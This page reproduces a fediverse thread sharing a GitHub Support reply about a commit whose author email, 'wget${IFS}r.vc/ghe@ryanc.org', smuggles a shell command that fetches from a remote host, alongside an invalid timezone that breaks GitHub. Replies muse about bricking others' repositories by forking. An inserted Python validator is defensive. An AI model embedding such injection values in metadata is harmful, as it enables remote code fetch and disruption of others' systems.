GNU social JP
Conversation

Notices

  1. Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:23:02 JST
    • Q ✨

    @q

    Formatting may get slightly mangled here, but should be decipherable:

    GitHub Support, Jun 11, 2025, 8:17 AM UTC

    Hi Ryan,

    Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and invalid timestamps.

    $ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fe
    tree f828c7cd0f33131d46f8761fd875f64ce5af880d
    parent a69b1149073c467803f73a2efd55c10f07051e59
    author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456
    committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

    Author and committer email:

    author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

    That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

    Timestamps:

    1668615481 -2456

    The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

    Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

    In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

    • Inspecting how it got into the repository

    • Rewriting history to remove it (if it was part of a PR or forced push)

    • Checking your workflow or scripts for unsafe parsing of Git metadata

    Please give this a try and update me on how it goes.

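The support reply above describes two things a workflow script should refuse before it ever interpolates commit metadata into a command: shell metacharacters in the author/committer email and a timezone offset outside -1200..+1400. The following is an added example of such a check (not code from GitHub or from the thread's participants); it parses raw `git cat-file commit` output, and the embedded sample is a constructed reproduction of the commit object quoted in the reply.

```python
import re

# Constructed sample: the commit from the support reply, one header per line
# (the page's listing has the lines run together). Message body is made up.
SAMPLE_COMMIT = """tree f828c7cd0f33131d46f8761fd875f64ce5af880d
parent a69b1149073c467803f73a2efd55c10f07051e59
author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456
committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

constructed commit message
"""

# Characters a shell would interpret if the field were pasted unquoted into
# a command line; '$', '{' and '}' are what the ${IFS} trick relies on.
SHELL_META = set('$`{}|;&<>()\\\'"\n\t ')

# git ident line: "<role> <name> <email> <epoch> <+/-HHMM>" (assumed layout).
IDENT_RE = re.compile(r'^(author|committer) (.*) <([^>]*)> (\d+) ([+-])(\d{2})(\d{2})$')


def check_ident_line(line):
    """Return a list of findings (empty if clean) for one author/committer line."""
    m = IDENT_RE.match(line)
    if not m:
        return [f'{line.split(" ", 1)[0]}: ident line does not match the expected layout']
    role, _name, email, _epoch, sign, hh, mm = m.groups()
    findings = []
    if any(c in SHELL_META for c in email):
        findings.append(f'{role}: email contains shell metacharacters: {email!r}')
    signed = int(hh) * 100 + int(mm)
    if sign == '-':
        signed = -signed
    # Real offsets lie in -1200..+1400 and the minute part is below 60.
    if int(mm) >= 60 or signed < -1200 or signed > 1400:
        findings.append(f'{role}: timezone offset {sign}{hh}{mm} is out of range')
    return findings


def audit_commit(raw):
    """Scan the header block of a raw commit object and return all findings."""
    headers = raw.split('\n\n', 1)[0].splitlines()
    findings = []
    for line in headers:
        if line.startswith(('author ', 'committer ')):
            findings.extend(check_ident_line(line))
    return findings


if __name__ == '__main__':
    for finding in audit_commit(SAMPLE_COMMIT):
        print(finding)
```

A CI step can feed it `git cat-file commit <sha>` for each pushed object and fail the job when `audit_commit` returns anything.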
    • Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:39:09 JST
      in reply to
      • Q ✨
      • samir, lost and found

      @samir @q you mean the original repository?

      Oh fuck, lol.

    • samir, lost and found (samir@mastodon.functional.computer)'s status on Wednesday, 11-Jun-2025 18:39:10 JST
      in reply to
      • Q ✨

      @ryanc @q I love this. ^_^

      This is the same GitHub where any commit on any fork is accessible in the forked repository, right?

      I wonder if you can brick someone else's repo by forking, without even opening a PR…

    • Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:41:32 JST
      in reply to
      • Q ✨
      • samir, lost and found

      @samir @q they replied no to my cheeky request for a bug bounty, and I have shared this gem of deviousness

    • Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:42:34 JST
      in reply to
      • Q ✨
      • samir, lost and found

      @samir @q feel free to try and submit it yourself, just give me a shout in the greetz section :-)

    • samir, lost and found (samir@mastodon.functional.computer)'s status on Wednesday, 11-Jun-2025 18:42:36 JST
      in reply to
      • Q ✨

      @ryanc @q Only one way to find out.

      So, about that bug bounty… I think you have a case.

    • Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Thursday, 12-Jun-2025 00:08:51 JST
      in reply to
      • Q ✨
      • Leah Neukirchen

      @leah @q the formatting screwed it up, it's actually wrapped in backticks and yes it's a working email address.

    • Leah Neukirchen (leah@blahaj.social)'s status on Thursday, 12-Jun-2025 00:08:53 JST
      in reply to
      • Q ✨

      @ryanc @q that's a valid email address, no?

    • Rich Felker (dalias@hachyderm.io)'s status on Thursday, 12-Jun-2025 00:14:00 JST
      in reply to
      • Q ✨

      @ryanc @q LMAO, now I know how to keep folks from mirroring my stuff on GitHub and SEO-burying the real repo. 🤣

GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

Creative Commons Attribution 3.0 All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.